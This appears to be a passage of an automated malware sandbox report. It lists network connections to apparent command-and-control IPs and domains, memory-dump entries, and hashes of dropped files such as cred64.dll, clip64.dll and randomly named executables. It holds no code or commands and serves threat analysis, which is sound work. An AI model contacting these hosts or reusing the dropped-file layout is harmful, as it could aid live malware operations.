US 104.21.48.243:443 alcojoldwograpciw.shop tcp
US 8.8.8.8:53 225.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 106.86.21.104.in-addr.arpa udp
US 8.8.8.8:53 243.48.21.104.in-addr.arpa udp
US 8.8.8.8:53 liabilitynighstjsko.shop udp
US 104.21.44.3:443 liabilitynighstjsko.shop tcp
RU 185.215.113.67:26260 tcp
US 8.8.8.8:53 3.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 demonstationfukewko.shop udp
US 172.67.147.169:443 demonstationfukewko.shop tcp
US 8.8.8.8:53 169.147.67.172.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 5.42.65.67:48396 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
FR 52.143.157.84:80 52.143.157.84 tcp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 yip.su udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 104.21.79.77:443 yip.su tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 84.157.143.52.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 175.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
US 8.8.8.8:53 jonathantwo.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
RU 77.221.151.47:80 77.221.151.47 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 79.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 47.151.221.77.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 172.67.193.79:443 realdeepai.org tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 172.67.193.79:443 realdeepai.org tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.228:80 tcp
NL 185.26.182.124:443 tcp
NL 185.26.182.124:443 tcp
NL 82.145.217.121:443 tcp
NL 185.26.182.117:443 tcp
NL 82.145.216.15:443 tcp
US 2.16.106.156:443 tcp
NL 185.26.182.124:443 tcp
US 8.8.8.8:53 udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 104.26.9.59:443 tcp
US 34.117.186.192:443 tcp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 104.26.9.59:443 tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
DE 185.172.128.228:80 tcp
US 34.117.186.192:443 tcp
US 20.157.87.45:80 tcp
RU 5.42.66.10:80 tcp
DE 185.172.128.76:80 tcp
US 8.8.8.8:53 76.128.172.185.in-addr.arpa udp
DE 185.172.128.76:80 tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:443 download.iolo.net tcp
US 8.8.8.8:53 51.56.244.143.in-addr.arpa udp
RU 77.221.151.47:8080 tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 66.85.215.91.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 199.232.210.172:80 tcp
US 199.232.210.172:80 tcp
US 199.232.210.172:80 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 185.26.182.117:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 89.10.18.104.in-addr.arpa udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp
RU 77.221.151.47:8080 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 80.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.200.14:443 clients2.google.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 216.58.201.97:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.239.127.146:80 api5.check-data.xyz tcp
US 8.8.8.8:53 146.127.239.44.in-addr.arpa udp
US 8.8.8.8:53 2835a0d1-f2ee-427a-b2fd-65f8e54e5645.uuid.statscreate.org udp
US 8.8.8.8:53 server15.statscreate.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.ipfire.org udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.96:443 server15.statscreate.org tcp
DE 81.3.27.44:3478 stun.ipfire.org udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 44.27.3.81.in-addr.arpa udp

Files

memory/2916-0-0x0000000000B00000-0x0000000000FB7000-memory.dmp

memory/2916-1-0x00000000777A4000-0x00000000777A5000-memory.dmp

memory/2916-3-0x0000000004B20000-0x0000000004B21000-memory.dmp

memory/2916-2-0x0000000000B00000-0x0000000000FB7000-memory.dmp

memory/2916-9-0x0000000004B40000-0x0000000004B41000-memory.dmp

memory/2916-8-0x0000000004B00000-0x0000000004B01000-memory.dmp

memory/2916-7-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

memory/2916-6-0x0000000004B50000-0x0000000004B51000-memory.dmp

memory/2916-5-0x0000000004B10000-0x0000000004B11000-memory.dmp

memory/2916-4-0x0000000004B30000-0x0000000004B31000-memory.dmp

memory/2916-11-0x0000000004B70000-0x0000000004B71000-memory.dmp

memory/2916-12-0x0000000004B60000-0x0000000004B61000-memory.dmp

memory/2916-16-0x0000000000B00000-0x0000000000FB7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

MD5 7b51614032cf0e89432f5ff123c65044
SHA1 c9aeeee7d2db471eac0bf71cfa948d491a2bb4b6
SHA256 f9e1bf035e5664900080e1ae1d88d6249049aec0da812c49bb976af43a7bc287
SHA512 20603dc18c014996fdf5773f473471527c8454c64c67344264ffa1798ed151d4bb09375fc151b2cfa4503607b707db18d9f0ba96775872fc3e94be58963b55f2

memory/1680-19-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/1680-24-0x00000000057F0000-0x00000000057F1000-memory.dmp

memory/1680-23-0x0000000005850000-0x0000000005851000-memory.dmp

memory/1680-22-0x0000000005820000-0x0000000005821000-memory.dmp

memory/1680-26-0x0000000005800000-0x0000000005801000-memory.dmp

memory/1680-25-0x0000000005810000-0x0000000005811000-memory.dmp

memory/1680-21-0x0000000005830000-0x0000000005831000-memory.dmp

memory/1680-20-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/1680-27-0x0000000005880000-0x0000000005881000-memory.dmp

memory/1680-28-0x0000000005870000-0x0000000005871000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

MD5 1c7d0f34bb1d85b5d2c01367cc8f62ef
SHA1 33aedadb5361f1646cffd68791d72ba5f1424114
SHA256 e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c
SHA512 53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

memory/200-42-0x0000000000CD0000-0x0000000000D22000-memory.dmp

memory/200-43-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/2296-46-0x0000000000400000-0x000000000044C000-memory.dmp

memory/2296-49-0x0000000000400000-0x000000000044C000-memory.dmp

memory/200-50-0x0000000003020000-0x0000000005020000-memory.dmp

memory/2296-52-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-51-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-53-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-54-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-55-0x0000000001480000-0x00000000014C0000-memory.dmp

memory/2296-56-0x0000000000400000-0x000000000044C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

memory/956-70-0x0000000000400000-0x0000000000592000-memory.dmp

memory/1680-71-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/2336-72-0x0000000000020000-0x00000000002D8000-memory.dmp

memory/956-75-0x00000000729F0000-0x00000000730DE000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

MD5 20ae0bb07ba77cb3748aa63b6eb51afb
SHA1 87c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256 daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512 db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

MD5 0c582da789c91878ab2f1b12d7461496
SHA1 238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256 a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512 a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

memory/1396-83-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/1396-84-0x0000000000100000-0x0000000000152000-memory.dmp

memory/1396-85-0x0000000004EC0000-0x00000000053BE000-memory.dmp

memory/1396-86-0x0000000004A60000-0x0000000004AF2000-memory.dmp

memory/1680-88-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/1396-89-0x0000000004A50000-0x0000000004A60000-memory.dmp

memory/1396-87-0x00000000049D0000-0x00000000049DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp8865.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/2892-105-0x00000000004F0000-0x00000000005B0000-memory.dmp

memory/1396-108-0x0000000005540000-0x00000000055B6000-memory.dmp

memory/2892-109-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/200-110-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/1396-111-0x0000000005CD0000-0x0000000005CEE000-memory.dmp

memory/200-112-0x0000000003020000-0x0000000005020000-memory.dmp

memory/2892-113-0x000000001B1D0000-0x000000001B1E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

MD5 b22521fb370921bb5d69bf8deecce59e
SHA1 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256 b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA512 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c

memory/1396-124-0x0000000006540000-0x0000000006B46000-memory.dmp

memory/1396-125-0x00000000060B0000-0x00000000061BA000-memory.dmp

memory/1396-127-0x0000000006040000-0x000000000607E000-memory.dmp

memory/1932-133-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1396-132-0x00000000061C0000-0x000000000620B000-memory.dmp

memory/1924-134-0x0000000000E20000-0x0000000000E94000-memory.dmp

memory/1932-136-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1932-137-0x0000000000400000-0x000000000044E000-memory.dmp

memory/1396-126-0x0000000005FE0000-0x0000000005FF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

MD5 8026082d59bac905bcc4098c69b98743
SHA1 5c8bffce653aa3b6c3e14d5f02927648b5ca8768
SHA256 f6bfa172fb2a124980f8134f6b5c765e7af52133a0c828e87d05b40a1a3f5005
SHA512 304339d26694f1225a23014862676f759c9332ea43ab53c9cb665346228dbed5ece4dca5e41b4d577fdf18ea70f7c61cda852e5122a7fbcf3bdfec5acc0f9f42

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

MD5 8510bcf5bc264c70180abe78298e4d5b
SHA1 2c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA512 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

MD5 f35b671fda2603ec30ace10946f11a90
SHA1 059ad6b06559d4db581b1879e709f32f80850872
SHA256 83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7
SHA512 b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

memory/4872-189-0x0000020F73AB0000-0x0000020F73AC0000-memory.dmp

memory/4872-187-0x00007FF931350000-0x00007FF931D3C000-memory.dmp

memory/3228-194-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/3228-193-0x0000000000950000-0x00000000009A2000-memory.dmp

memory/956-192-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/3228-195-0x0000000005200000-0x0000000005210000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-873560699-1074803302-2326074425-1000\76b53b3ec448f7ccdda2063b15d2bfc3_9251837d-e9a5-4229-9a78-b1085d98b1bb

MD5 c117b2495e0bf84ef6be7c4efd6974b8
SHA1 c26648871010d12fd8159e6cba9da8a129ccba22
SHA256 321e013dd27479144dbc9adf9c76cdcce19dc34b76fe5a83448a98229bcff95a
SHA512 5ffb45f7d1891acdbbe4a51faa12b746758d21888ca3812d16a81f97770119207fc6fabff4913dbd4d80a70999ecf5afef11e1307dbdc1850fa2f272b9f1ca38

memory/4872-182-0x0000020F594A0000-0x0000020F5950E000-memory.dmp

memory/4872-213-0x0000020F5B100000-0x0000020F5B15E000-memory.dmp

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 bc66475ee3b9ba37ec6828944dadd734
SHA1 9b82600ed9625cd85c114473a66b2160aea60b0a
SHA256 4c14b7589cf62d4a93c2e2e3f6b74c3b2424973df96e12dfbfb988cc6d29d409
SHA512 e45e908918f2c08cc2a1fe85f268c858a6bfa082c792ce893ef649aeffe7d570b791236f70f6f9e1ac2388173a6e5b76fe53a340685d0f1880bb2f28a440cbdf

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

MD5 586f7fecacd49adab650fae36e2db994
SHA1 35d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256 cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512 a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

memory/292-229-0x0000000000170000-0x000000000019E000-memory.dmp

memory/1396-231-0x00000000729F0000-0x00000000730DE000-memory.dmp

memory/424-243-0x0000000000400000-0x000000000063B000-memory.dmp

memory/2984-236-0x0000000000400000-0x0000000000408000-memory.dmp

memory/424-250-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

MD5 7fabf15848c951f6665ec449c8c77098
SHA1 f9ef6114a8e2d3838d0cadd4a71d6baf95e133cf
SHA256 a440e88b2c1d1746b82ffaadaef0571a14f3d76dbabba87b0c3de6ac5eff2f35
SHA512 4e8b84b13bf04befb12d2f1b2f36a1a7285be640315c1a8eb61137f77ca2202b62892d95fee02debaa75ca3b5d782a5d0a7a08a010206929187504a91e9ddb0a

memory/1680-289-0x0000000001120000-0x00000000015D7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vj2byeji.lk3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\Pictures\6p7Lc6wCyyx5sjdGwLrlnZ6Q.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\4bfKBpwrjclcPetR6QZGvVSR.exe

MD5 5639162c3324d30242a477f678cdf7ae
SHA1 6383b421604381f6418a65219e47629d110d5a9a
SHA256 5166f78d79dd4747fd9b2215b272427b8cf4cd80fa4fee5f1a291a81fb5f50cd
SHA512 02528ebb3e42f38b65152fb341e01dfe0d9aa6c381bdb742432335d8850af1fd7813d1369d05b03d884d61910fa5d1140ee6553bc25a0d5e043ef1c6d3aabd61

C:\Users\Admin\Pictures\uULd8wDgkRpZYPF3wlNOaWaV.exe

MD5 b6c03763d95cfc6ddfabcac9c0b36dc2
SHA1 122d715c03c197df8e4ede8b94f4cd2c9dba6c57
SHA256 77809f86a370b278605306dd2bc04c713e0061d7092c8b7e5a2c6334b49314a2
SHA512 e1dbfb5ed5d3d9c147433577893fde4db790cdd966dfae2a19c93ab4e97dc23662089fb0682e50ff4c7950ac75a955e9bc15ebc145e9f426b5f2e43c2d6a7199

memory/4044-335-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000208001\install.exe

MD5 6184676075afacb9103ae8cbf542c1ed
SHA1 bc757642ad2fcfd6d1da79c0754323cdc823a937
SHA256 a0b0b39b69005a2d39a8b8271a3518aa0a55148b794d2b4995b3c87ed183b23b
SHA512 861ac361b585a069f2274b577b30f2a13baf72a60acd4f22da41885aee92c3975445150822f1072590d7b574ff54eb3abde6a6c4f800988ab9ff4344884f41fa

memory/424-400-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 154c3f1334dd435f562672f2664fea6b
SHA1 51dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA256 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA512 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

C:\Users\Admin\AppData\Local\ybNrgxULfUnAMWHEEnovJtXp.exe

MD5 f8010cfbb1ea6f0c8525eaba77721cf7
SHA1 cf5e7b72af904301fa13f7ec8a8be324dde5c3ea
SHA256 5f07907b56589f833d0916aa6b4428977082a844878e620f49053dc868670f52
SHA512 f295deaf43a8a6f1ec8fc2172da6c569914e8e91f814ff575be2856b227a7ad3be889913113d8c0f690dcf7b321ba74adc74eac00b05e1abeb3a288b6ab5dcec

C:\Users\Admin\AppData\Local\Temp\tmpD0D9.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

memory/1680-513-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/4960-516-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3ts.0.exe

MD5 986c6384b1282fbf0053f17ed64e8d6b
SHA1 c92f082073a5d85f433c985b9d7cd62e4b03b239
SHA256 bb175eb1e0a3560fa5bd83ffa7291420e4be8382a2c36c9687018d77fe86721e
SHA512 b46706cf42ade93c0ddc1925a2a1acca39da1183462b5121c01888e40c5bcc05e698b6929985e308495ed6f528fe01b51cf9204f51d38ad3e58ad8f859ab69f2

C:\Program Files (x86)\GameServerClient\installg.bat

MD5 b6b57c523f3733580d973f0f79d5c609
SHA1 2cc30cfd66817274c84f71d46f60d9e578b7bf95
SHA256 d8d718641bdf39cca1a5db7bb52d3c66d400a97bef3cafdd81cd7e711a51c570
SHA512 d39440163592bc3b1cb7830f236a97d5819c10775e453637d5a04a981e9a336480c6b4701afdceba0d52dfe09413b7abe2ad58ff55b5057a26229f3ccdc3a7c7

memory/1360-543-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u3ts.1.zip

MD5 78d3ca6355c93c72b494bb6a498bf639
SHA1 2fa4e5df74bfe75c207c881a1b0d3bc1c62c8b0e
SHA256 a1dd547a63b256aa6a16871ed03f8b025226f7617e67b8817a08444df077b001
SHA512 1b2df7bee2514aee7efd3579f5dd33c76b40606d07dba69a34c45747662fad61174db4931bca02b058830107959205e889fee74f8ccc9f6e03f9fd111761f4ea

memory/4980-556-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 039e44f4c3f36bbd059c2dee6ad0b06d
SHA1 4749f71f21eb9069cfacc3f2be88184c08ae19f8
SHA256 1daf147d884f525ad7c501c492637ccd2202881d992893e762cc825e50f53576
SHA512 1146f08174af0d3f854fac7d434cce0a6f639cb0057d9f5ed3bb897822198a87c5cdf2c361d9f2cff87bc0cd40bbad15ce271631608bdb548eea2bf1a3de0e08

C:\Program Files (x86)\GameServerClient\GameService.exe

MD5 d9ec6f3a3b2ac7cd5eef07bd86e3efbc
SHA1 e1908caab6f938404af85a7df0f80f877a4d9ee6
SHA256 472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c
SHA512 1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

memory/5636-707-0x0000000000400000-0x0000000002C46000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 7ce47df53c8f0ba7ccf885c309afc484
SHA1 b25ad9723b06d3861498caa32ffb1b7b38701a95
SHA256 7031b6b7bc43cf4ee90d4ec4860b78a442352243ea28f5d959b56222b13de2e4
SHA512 78585fbfcfe2e7a27f0ee168075958923184e67da1668850d0e66e31f0fd0a5516c04a17693ad197da7ffffb179265cd54fe0629fa30e00a6f269c6d68277efd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e5d2bce770d65e0ae6792874dcc48233
SHA1 853be0952dc8a6ba3c0256f86392b96196483c32
SHA256 e84d4bfc979ea85f4b431584089da16709a836bae727dc3f1ee97e5092a2836f
SHA512 11abdf2bb84b0d8fc43c81e7f7af5400889c3d3d180f9533113f375893e014c1dd7ffae655f677318211ed1d894635b56223cb712c460d6e6a55c045ba401998

C:\Program Files (x86)\GameServerClient\GameServerClient.exe

MD5 bf4360d76b38ed71a8ec2391f1985a5f
SHA1 57d28dc8fd4ac052d0ae32ca22143e7b57733003
SHA256 4ebec636d15203378e15cc11967d00cbd17e040db1fca85cf3c10bbf7451adaf
SHA512 7b46bc87dc384d8227adf5b538861165fa9efa18e28f2de5c1a1bb1a3a9f6bef29b449706c4d8e637ae9805bb51c8548cb761facf82d1c273d3e3699ae727acd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1713c1068fbcd242e0e2a7409a1dc4f1
SHA1 1421c2e7c40559e382f9c8e7cd449a693e2ee4c4
SHA256 3562ad72f78b76bcb26547ff3a74dea0c86e9d3e97efbeaba663c5300e3d2769
SHA512 0b18ced85a8657e03b123b682333cf81358d2b9edc10c390c9d4e500d9e0c91995bc65cdf7cf45a74a9531f6724cabe9f3751fd4782f0eeefefb4ba84d3c04c1

C:\Users\Admin\AppData\Local\Temp\u3ts.2\run.exe

MD5 9fb4770ced09aae3b437c1c6eb6d7334
SHA1 fe54b31b0db8665aa5b22bed147e8295afc88a03
SHA256 a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3
SHA512 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256

memory/1680-758-0x0000000001120000-0x00000000015D7000-memory.dmp

memory/4960-759-0x0000000000400000-0x0000000002C46000-memory.dmp

memory/6132-760-0x0000000000400000-0x0000000003005000-memory.dmp

memory/5268-761-0x0000000000400000-0x0000000003005000-memory.dmp

memory/1360-764-0x0000000000400000-0x0000000003005000-memory.dmp

C:\Users\Admin\Pictures\u1wfpxgDHV6skxM1Fy0QY0QV.exe

MD5 f75a721168b26ed37766cea55ab2601c
SHA1 c878bc98c0571bae149c5a716811ea0f082f793a
SHA256 a438d6fb093ab1057905c745d8be9199ce8ff5b8c7a74ba274cf0f2a491a4ef4
SHA512 166abccddc272c1d487195e340ff0ea9e4e51376e04308195f198aaf6744437818606cd3ef3f217ecf89a474d677b01bd5fc6bbf491883f912318d6c37b16455

\Users\Admin\AppData\Local\Temp\Opera_installer_2404252230432084312.dll

MD5 45fe60d943ad11601067bc2840cc01be
SHA1 911d70a6aad7c10b52789c0312c5528556a2d609
SHA256 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add
SHA512 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba

memory/3900-783-0x000000006A250000-0x000000006A3CB000-memory.dmp

memory/3900-784-0x00007FF94DFB0000-0x00007FF94E18B000-memory.dmp

memory/4980-792-0x0000000000400000-0x0000000003005000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
